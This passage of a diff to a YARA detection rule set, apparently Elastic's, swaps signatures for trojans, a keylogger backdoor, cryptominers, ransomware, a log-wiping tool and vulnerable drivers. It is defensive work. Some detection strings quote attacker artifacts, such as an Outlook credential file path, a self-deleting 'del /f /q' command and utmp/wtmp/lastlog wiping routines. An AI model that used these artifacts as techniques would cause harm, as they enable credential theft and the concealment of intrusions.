"https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_Elby.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b" - logic_hash = "7c7438520b238daf38d4ac91cbdee48bbfa9c85bd76208a436ce59edcfcecb80" - score = 75 - quality = 75 - tags = "FILE" - fingerprint = "88bfab229f2f2d66b4c732a6548ee6f31e6b0905eeea3b8f0f874094c1dbc98a" - threat_name = "Windows.VulnDriver.Elby" - severity = 50 - arch_context = "x86" - scan_context = "file" - license = "Elastic License v2" - os = "windows" - - strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 45 00 6C 00 62 00 79 00 43 00 44 00 49 00 4F 00 2E 00 73 00 79 00 73 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x00][\x00-\x00])([\x00-\x06][\x00-\x00])([\x00-\x02][\x00-\x00])([\x00-\x03][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x05][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x00][\x00-\x00])([\x00-\x06][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\x02][\x00-\x00]))/ - - condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version -} -rule ELASTIC_Windows_Trojan_Wineloader_13E8860A : FILE MEMORY -{ - meta: - description = "Detects Windows Trojan Wineloader (Windows.Trojan.WineLoader)" - author = "Elastic Security" - id = "13e8860a-9d83-4ae6-b07e-20bb4037010c" - date = "2024-03-24" - modified = "2024-05-08" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_WineLoader.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f5cb3234eff0dbbd653d5cdce1d4b1026fa9574ebeaf16aaae3d4e921b6a7f9d" - logic_hash = "c072abb73377ed59c0dd9fab25a4c84575ab9badbddfda1ed51e576e4e12fa82" - score = 75 - quality = 75 - tags = "FILE, MEMORY" - fingerprint = "d21c6d97360deea724b94b8f65116f00c11625c5deb1bac0790a23ede6eaaac6" - severity = 100 - arch_context = "x86" - scan_context = "file, memory" - license = "Elastic License v2" - os = "windows" - - strings: - $a1 = { 48 8B 1E 48 89 F1 E8 ?? ?? 00 00 48 8B 56 08 48 89 F9 49 89 D8 E8 ?? ?? FF FF 48 89 F1 E8 ?? 5C 00 00 90 48 81 C4 ?? 00 00 00 5B 5D 5F 5E 41 5C 41 5E 41 5F C3 C3 41 57 41 56 41 55 41 54 56 57 } - $a2 = { 85 C0 0F 84 ?? 03 00 00 4C 8D A4 24 BC 00 00 00 41 C7 04 24 04 00 00 00 B8 0F 00 00 00 48 8D 7C 24 70 48 89 47 F8 48 B8 } - $a3 = { 48 85 DB 0F 84 B3 00 00 00 83 BC 24 80 01 00 00 00 0F 84 5A 01 00 00 4C 8D 74 24 50 49 C7 46 F8 0D 00 00 00 48 B8 } - - condition: - any of them -} -rule ELASTIC_Macos_Backdoor_Keyboardrecord_832F7Bac : FILE -{ - meta: - description = "Detects Macos Backdoor Keyboardrecord (MacOS.Backdoor.Keyboardrecord)" - author = "Elastic Security" - id = "832f7bac-3896-4934-b05f-8215a41cca74" - date = "2021-11-11" - modified = "2022-07-22" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Backdoor_Keyboardrecord.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "570cd76bf49cf52e0cb347a68bdcf0590b2eaece134e1b1eba7e8d66261bdbe6" - logic_hash = "5719681d50134edacb5341034314c33ed27e9325de0ae26b2a01d350429c533b" - score = 75 - quality = 75 - tags = "FILE" - fingerprint = "27aa4380bda0335c672e957ba2ce6fd1f42ccf0acd2eff757e30210c3b4fb2fa" - severity = 100 - arch_context = "x86" - scan_context = "file" - license = "Elastic License v2" - os = "macos" - - strings: - $s1 = "com.ccc.keyboardrecord" - $s2 = "com.ccc.write_queue" - $s3 = "ps -p %s > /dev/null" - $s4 = "useage %s path useragentpid" - $s5 = "keyboardRecorderStartPKc" - - condition: - 3 of them -} -rule ELASTIC_Windows_Trojan_Pikabot_8C6750B5 : FILE MEMORY -{ - meta: - description = "Detects Windows Trojan Pikabot (Windows.Trojan.PikaBot)" - author = "Elastic Security" - id = "8c6750b5-d232-4b72-8fe0-3a00f7058420" - date = "2023-06-05" - modified = "2023-06-19" - reference = "https://www.elastic.co/security-labs/pikabot-i-choose-you" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_PikaBot.yar#L1-L25" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "59f42ecde152f78731e54ea27e761bba748c9309a6ad1c2fd17f0e8b90f8aed1" - logic_hash = "03e36f927513625d1dd997c79843b1b14e344e8411155740213d7aff9794c5c6" - score = 75 - quality = 75 - tags = "FILE, MEMORY" - fingerprint = "5995c2857b660d92afc197d8a2b0323f4b4f6a0d65d1aeea5d53353c10e8092a" - severity = 100 - arch_context = "x86" - scan_context = "file, memory" - license = "Elastic License v2" - os = "windows" - - strings: - $byte_seq0 = { B8 00 00 00 00 CD 2D 90 C3 CC CC CC CC CC CC CC } - $byte_seq1 = { 64 A1 30 00 00 00 8B 40 ?? C3 } - $byte_seq2 = { 8B 45 FC 8B 44 85 B4 89 45 F0 8B 45 08 89 45 F8 8B 45 10 C1 E8 02 89 45 F4 } - $byte_seq3 = { 8B 4C 8D BC ?? 75 FC 33 C0 64 A1 30 00 00 00 8B 40 68 83 E0 70 89 45 FC } - $byte_seq4 = { 8B 45 F8 8B 4D 0C 89 08 8B 45 F8 83 C0 04 89 45 F8 8B 45 F4 48 89 45 F4 } - $byte_seq5 = { 64 A1 30 00 00 00 8B 40 0C 8B 40 0C 8B 00 8B 00 8B 40 18 C3 } - - condition: - 4 of them -} -rule ELASTIC_Windows_Trojan_Pikabot_5B220E9C : FILE MEMORY -{ - meta: - description = "Detects Windows Trojan Pikabot (Windows.Trojan.PikaBot)" - author = "Elastic Security" - id = "5b220e9c-3232-4a86-82b7-31f96c95242c" - date = "2024-02-06" - modified = "2024-02-08" - reference = "https://www.elastic.co/security-labs/pikabot-i-choose-you" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_PikaBot.yar#L27-L52" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d836b06b0118e6d258e318b1cfdc509cacc0859c6a6b3d7c5f4d2525e00d97b2" - logic_hash = "1d2158716b7c32734f12f8528352a3872e21fea2f9b21a36d6ac44fcd50a9f3c" - score = 75 - quality = 75 - tags = "FILE, MEMORY" - fingerprint = "3a7ba8156f9ad017cdb8630770bf900c198215306a125f6f7dcd845f2c683948" - severity = 100 - arch_context = "x86" - scan_context = "file, memory" - license = "Elastic License v2" - os = "windows" - - strings: - $byte_seq0 = { 03 44 95 ?? 42 83 FA ?? 7C ?? EB ?? } - $byte_seq1 = { 3B C1 73 ?? 80 3C 18 ?? 75 ?? C6 04 18 ?? 40 EB ?? } - $byte_seq2 = { 03 C7 03 C8 0F B6 F9 8A 84 3D 34 FD FF FF 88 84 35 34 FD FF FF } - $byte_seq3 = { 55 8B EC 83 EC 0C 33 C0 C7 45 F4 05 00 00 00 C7 45 F8 32 00 00 00 8B D0 C7 45 FC C9 FF FF FF } - $byte_seq4 = { 55 8B EC 51 51 53 56 89 55 F8 89 4D FC 8B 75 FC 8B 45 F8 33 C9 0F A2 89 06 89 5E 04 89 4E 08 89 } - $byte_seq5 = { 8D 5D E8 59 33 D2 C7 45 F8 04 00 00 00 8A 03 8D 0C 16 43 88 04 39 83 6D F8 01 8D 52 04 75 EE 46 } - $byte_seq6 = { 55 8B EC 51 51 53 56 89 55 F8 89 4D FC 8B 75 FC 8B 45 F8 33 C9 0F A2 89 06 89 5E 04 89 4E 08 89 } - - condition: - 2 of them -} -rule ELASTIC_Windows_Trojan_Pikabot_5441F511 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ddostf_6Dc1Caab : FILE MEMORY { meta: - description = "Related to Pikabot core" + description = "Detects Linux Trojan Ddostf (Linux.Trojan.Ddostf)" author = "Elastic Security" - id = "5441f511-82f2-4971-b9ff-7fe739041357" - date = "2024-02-15" - modified = "2024-02-21" - reference = "https://www.elastic.co/security-labs/pikabot-i-choose-you" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_PikaBot.yar#L54-L78" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "fa44408874c6a007212dfc206cbecbac7a3e50df94da4ce02de2e04e9119c79f" + id = "6dc1caab-be84-4f27-a059-2acffc20ca2c" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ddostf.yar#L40-L58" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f4587bd45e57d4106ebe502d2eaa1d97fd68613095234038d67490e74c62ba70" + logic_hash = "fd70960ed6e06f4d152bbd211fbe491dad596010da12cd53c93b577b551b8053" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7a90c7e21ebffd6276bd53e37d4a09df29d3d1167024b96a39504518f0a38dfe" - threat_name = "Windows.Trojan.PikaBot" + fingerprint = "43bcb29d92e0ed2dfd0ff182991864f8efabd16a0f87e8c3bb453b47bd8e272b" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $handler_table = { 72 26 [6] 6F 24 [6] CB 0A [6] 6C 03 [6] 92 07 } - $api_hashing = { 3C 60 76 ?? 83 E8 20 8B 0D ?? ?? ?? ?? 6B FF 21 } - $debug_check = { A1 ?? ?? ?? ?? FF 50 ?? 50 50 80 7E ?? 01 74 ?? 83 7D ?? 00 75 ?? } - $checksum = { 55 89 E5 8B 55 08 69 02 E1 10 00 00 05 38 15 00 00 89 02 5D C3 } - $load_sycall = { 8F 05 ?? ?? ?? ?? 83 C0 04 50 8F 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 04 A3 ?? ?? ?? ?? 31 C0 64 8B 0D C0 00 00 00 85 C9 } - $read_xbyte_config = { 8B 43 04 8B 55 F4 B9 FC FF FF FF 83 C0 04 29 D1 01 4B 0C 8D 0C 10 89 4B 04 85 F6 ?? ?? 89 16 89 C3 } + $a = { FC 01 83 45 F8 01 83 7D F8 5A 7E E6 C7 45 F8 61 00 00 00 EB 14 8B } condition: - 2 of them + all of them } -rule ELASTIC_Windows_Trojan_Pikabot_95Db8B5A : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ddostf_Dc47A873 : FILE MEMORY { meta: - description = "Related to Pikabot loader" + description = "Detects Linux Trojan Ddostf (Linux.Trojan.Ddostf)" author = "Elastic Security" - id = "95db8b5a-f97d-42bd-a114-e35e031784e2" - date = "2024-02-15" - modified = "2024-02-21" - reference = "https://www.elastic.co/security-labs/pikabot-i-choose-you" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_PikaBot.yar#L80-L103" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "74073ceae1b26b953b7644d56a2ec92993b83802a30ce82c6921df5448ebab06" + id = "dc47a873-65a0-430d-a598-95be7134f207" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ddostf.yar#L60-L78" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1015b9aef1f749dfc31eb33528c4a4169035b6d73542e068b617965d3e948ef2" + logic_hash = "2f5bd9e012fd778388074cf29b56c7cd59391840f994835d087b7b661445d316" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f9463fa18fc5975aeabf076490bd8fe79c62c822126c5320f90870a9b4032f60" - threat_name = "Windows.Trojan.PikaBot" + fingerprint = "f103490a9dedc0197f50ca2b412cf18d2749c8d6025fd557f1686bc38f32db52" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $syscall_ZwQueryInfoProcess = { 68 9B 8B 16 88 E8 73 FF FF FF } - $syscall_ZwCreateUserProcess = { 68 B2 CE 2E CF E8 5F FF FF FF } - $load_sycall = { 8F 05 ?? ?? ?? ?? 83 C0 04 50 8F 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 04 A3 ?? ?? ?? ?? 31 C0 64 8B 0D C0 00 00 00 85 C9 } - $payload_chunking = { 8A 84 35 ?? ?? ?? ?? 8A 95 ?? ?? ?? ?? 88 84 1D ?? ?? ?? ?? 88 94 35 ?? ?? ?? ?? 02 94 1D ?? ?? ?? ?? } - $loader_rc4_decrypt_chunk = { F7 FF 8A 84 15 ?? ?? ?? ?? 89 D1 8A 94 1D ?? ?? ?? ?? 88 94 0D ?? ?? ?? ?? 8B 55 08 88 84 1D ?? ?? ?? ?? 02 84 0D ?? ?? ?? ?? 0F B6 C0 8A 84 05 ?? ?? ?? ?? 32 04 32 } + $a = { 05 88 10 8B 45 08 0F B6 10 83 E2 0F 83 CA 40 88 10 8B 45 08 C6 40 } condition: - 2 of them + all of them } -rule ELASTIC_Linux_Cryptominer_Attribute_3683D149 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ddostf_Cb0358A0 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Attribute (Linux.Cryptominer.Attribute)" + description = "Detects Linux Trojan Ddostf (Linux.Trojan.Ddostf)" author = "Elastic Security" - id = "3683d149-fa9c-4dbb-85b9-8ce2b1d1d128" + id = "cb0358a0-5303-4860-89ac-7dae037f5f0b" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Attribute.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ec9e74d52d745275718fe272bfd755335739ad5f680f73f5a4e66df6eb141a63" - logic_hash = "71aa8aa4171671af4aa0271b64da95ac1d8766de12a949c97ebcac9369224ecd" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ddostf.yar#L80-L98" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1015b9aef1f749dfc31eb33528c4a4169035b6d73542e068b617965d3e948ef2" + logic_hash = "1f152b69bf0b2bfa539fdd42c432e456b9efb3766a450333a987313bb12c1826" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "31f45578eab3c94cff52056a723773d41aaad46d529b1a2063a0610d5948a633" + fingerprint = "f97c96d457532f2af5fb0e1b40ad13dcfba2479c651266b4bdd1ab2a01c0360f" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -76139,28 +76254,28 @@ rule ELASTIC_Linux_Cryptominer_Attribute_3683D149 : FILE MEMORY os = "linux" strings: - $a = { 20 74 6F 20 66 61 73 74 29 20 6F 72 20 39 20 28 61 75 74 6F } + $a = { 66 C7 45 F2 00 00 8D 45 F2 8B 55 E4 0F B6 12 88 10 0F B7 45 F2 0F } condition: all of them } -rule ELASTIC_Linux_Hacktool_Wipelog_Daea1Aa4 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Moogrey_81131B66 : FILE MEMORY { meta: - description = "Detects Linux Hacktool Wipelog (Linux.Hacktool.Wipelog)" + description = "Detects Linux Exploit Moogrey (Linux.Exploit.Moogrey)" author = "Elastic Security" - id = "daea1aa4-0df7-4308-83e1-0707dcda2e54" - date = "2022-03-17" - modified = "2022-07-22" + id = "81131b66-788e-4456-9cb4-ffade713e8d4" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Hacktool_Wipelog.yar#L1-L29" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "39b3a95928326012c3b2f64e2663663adde4b028d940c7e804ac4d3953677ea6" - logic_hash = "e2483b7719f4a1e28ec3732120770066333d8db269c9c9711813a8eeb75176d6" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Moogrey.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "cc27b9755bd9feb1fb2c510f66e36c20a1503e6769cdaeee2bea7fe962d22ccc" + logic_hash = "dc2fe7caa38f665d24bbc673ff63491ebdeec8d56a420092243ce241238846cf" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "93f899e14e6331c2149ba5c0c1e9dd8def5a7d1b6d2a7af66eade991dea77b3c" + fingerprint = "d21e48c7afe580a764153ca489c24a7039ae663ebb281a4605f3a230a963e33e" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -76168,75 +76283,57 @@ rule ELASTIC_Linux_Hacktool_Wipelog_Daea1Aa4 : FILE MEMORY os = "linux" strings: - $s1 = "Erase one username on tty" - $s2 = "wipe_utmp" - $s3 = "wipe_acct" - $s4 = "wipe_lastlog" - $s5 = "wipe_wtmp" - $s6 = "getpwnam" - $s7 = "ERROR: Can't find user in passwd" - $s8 = "ERROR: Opening tmp ACCT file" - $s9 = "/var/log/wtmp" - $s10 = "/var/log/lastlog" - $s11 = "Patching %s ...." + $a = { 89 C0 89 45 D4 83 7D D4 00 79 1A 83 EC 0C 68 50 } condition: - 4 of them + all of them } -rule ELASTIC_Windows_Trojan_Stealc_B8Ab9Ab5 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Procid_86605Fa9 : FILE { meta: - description = "Detects Windows Trojan Stealc (Windows.Trojan.Stealc)" + description = "Detects Windows Vulndriver Procid (Windows.VulnDriver.ProcId)" author = "Elastic Security" - id = "b8ab9ab5-5731-4651-b982-03ad8fe347fb" - date = "2024-03-13" - modified = "2024-03-21" + id = "86605fa9-bf1a-4c2c-87f5-cb656ebe4cf3" + date = "2022-04-04" + modified = "2022-04-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Stealc.yar#L1-L27" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0d1c07c84c54348db1637e21260dbed09bd6b7e675ef58e003d0fe8f017fd2c8" - logic_hash = "5fc5d5cea481d1d204d1aa6c52679a23eb59438df2fe547d14c00524772867bb" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_ProcId.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29" + logic_hash = "882cdbd267d812e77e68e7080f1fca0ca3d7e75ab84c583c3ec148894b1cf644" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "49253b1d1e39ba25b2d3b622d00633b9629715e65e1537071b0f3b0318b7db12" - severity = 100 + tags = "FILE" + fingerprint = "6d8d926efd98d6eaa1d06d39fb5babf70abf6f0e639fb74f29f65836a79e4743" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $seq_str_decrypt = { 55 8B EC 83 EC ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 C0 ?? 50 } - $seq_lang_check = { 81 E9 19 04 00 00 89 4D ?? 83 7D ?? ?? 77 ?? 8B 55 ?? 0F B6 82 ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? } - $seq_mem_check_constant = { 72 09 81 7D F8 57 04 00 00 73 08 } - $seq_hwid_algo = { 8B 08 69 C9 0B A3 14 00 81 E9 51 75 42 69 8B 55 08 } - $str1 = "- Country: ISO?" ascii fullword - $str2 = "%d/%d/%d %d:%d:%d" ascii fullword - $str3 = "%08lX%04lX%lu" ascii fullword - $str4 = "\\Outlook\\accounts.txt" ascii fullword - $str5 = "/c timeout /t 5 & del /f /q" ascii fullword + $str1 = "\\piddrv64.pdb" condition: - (2 of ($seq*) or 4 of ($str*)) + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 } -rule ELASTIC_Windows_Trojan_Stealc_A2B71Dc4 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Darkvnc_Bd803C2E : FILE MEMORY { meta: - description = "Detects Windows Trojan Stealc (Windows.Trojan.Stealc)" + description = "Detects Windows Trojan Darkvnc (Windows.Trojan.DarkVNC)" author = "Elastic Security" - id = "a2b71dc4-4041-4c1f-b546-a2b6947702d1" - date = "2024-03-13" - modified = "2024-03-21" + id = "bd803c2e-77bd-4b8c-bdfa-11a9bd54a454" + date = "2023-01-23" + modified = "2023-02-01" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Stealc.yar#L29-L50" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0d1c07c84c54348db1637e21260dbed09bd6b7e675ef58e003d0fe8f017fd2c8" - logic_hash = "b79ac3e65cd7d2819d6a49f59ec661241c97174f66a7c4ada91932f10fc43583" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_DarkVNC.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0fcc1b02fdaf211c772bd4fa1abcdeb5338d95911c226a9250200ff7f8e45601" + logic_hash = "d9e8a42a424d6a186939682e1cd2ed794c8a3765824188e863b1b2829650e2d5" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "9eeb13fededae39b8a531fa5d07eaf839b56a1c828ecd11322c604962e8b1aec" + fingerprint = "131f4b3ef5b01720a52958058ecc4c3681ed0ca975a1a06cd034d7205680e710" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -76244,60 +76341,60 @@ rule ELASTIC_Windows_Trojan_Stealc_A2B71Dc4 : FILE MEMORY os = "windows" strings: - $seq_1 = { 8B C6 C1 E8 02 33 C6 D1 E8 33 C6 C1 E8 02 33 C6 83 E0 01 A3 D4 35 61 00 C1 E0 0F 66 D1 E9 66 0B C8 } - $seq_2 = { FF D3 8B 4D ?? E8 [4] 6A ?? 33 D2 5F 8B C8 F7 F7 85 D2 74 ?? } - $seq_3 = { 33 D2 8B F8 59 F7 F1 8B C7 3B D3 76 04 2B C2 03 C1 } - $seq_4 = { 6A 7C 58 66 89 45 FC 8D 45 F0 50 8D 45 FC 50 FF 75 08 C7 45 F8 01 } + $a1 = "BOT-%s(%s)_%S-%S%u%u" wide fullword + $a2 = "{%08X-%04X-%04X-%04X-%08X%04X}" wide fullword + $a3 = "monitor_off / monitor_on" ascii fullword + $a4 = "bot_shell >" ascii fullword + $a5 = "keyboard and mouse are blocked !" ascii fullword condition: - 2 of ($seq*) + all of them } -rule ELASTIC_Windows_Trojan_Stealc_5D3F297C : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Presenoker_3Bb5533D : FILE MEMORY { meta: - description = "Detects Windows Trojan Stealc (Windows.Trojan.Stealc)" + description = "Detects Linux Cryptominer Presenoker (Linux.Cryptominer.Presenoker)" author = "Elastic Security" - id = "5d3f297c-b812-401a-8671-2e00369cd6f2" - date = "2024-03-05" - modified = "2024-06-13" + id = "3bb5533d-4722-4801-9fbb-dd2c916cffc6" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Stealc.yar#L52-L70" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "885c8cd8f7ad93f0fd43ba4fb7f14d94dfdee3d223715da34a6e2fbb4d25b9f4" - logic_hash = "556d3bc9374a5ec23faa410900dfc94b5534434c9733165355d281976444a42b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Presenoker.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "bbc155c610c7aa439f98e32f97895d7eeaef06dab7cca05a5179b0eb3ba3cc00" + logic_hash = "13bf69ea6bc7df5ba9ebffe67234657f2ecab99e28fd76d0bbedceaf9706a4dd" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ff90bfcb28bb3164fb11da5f35f289af679805f7e4047e48d97ae89e5b820dcd" - severity = 50 + fingerprint = "a3005a07901953ae8def7bd9d9ec96874da0a8aedbebde536504abed9d4191fd" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 83 EC 08 C7 45 F8 00 00 00 00 83 7D 08 00 74 4A 83 7D 0C 00 74 44 8B 45 0C 83 C0 01 50 6A 40 ?? ?? ?? ?? ?? ?? 89 45 F8 83 7D F8 00 74 2C C7 45 FC 00 00 00 00 EB 09 8B 4D FC 83 C1 01 } + $a = { 47 10 74 72 F3 0F 6F 00 66 0F 7E C2 0F 29 04 24 85 D2 F3 0F 6F } condition: all of them } -rule ELASTIC_Linux_Ransomware_Gonnacry_53C3832D : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Bulz_2Aa8Fbb5 : FILE MEMORY { meta: - description = "Detects Linux Ransomware Gonnacry (Linux.Ransomware.Gonnacry)" + description = "Detects Linux Cryptominer Bulz (Linux.Cryptominer.Bulz)" author = "Elastic Security" - id = "53c3832d-ceff-407d-920b-7b6442688fa9" + id = "2aa8fbb5-b392-49fc-8f0f-12cd06d534e2" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Ransomware_Gonnacry.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f5de75a6db591fe6bb6b656aa1dcfc8f7fe0686869c34192bfa4ec092554a4ac" - logic_hash = "2b7453c4eb71b71e6a241f728b077a2ee63d988d55a64fedf61c34222799e262" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Bulz.yar#L1-L18" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "21d8bec73476783e01d2a51a99233f186d7c72b49c9292c42e19e1aa6397d415" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = 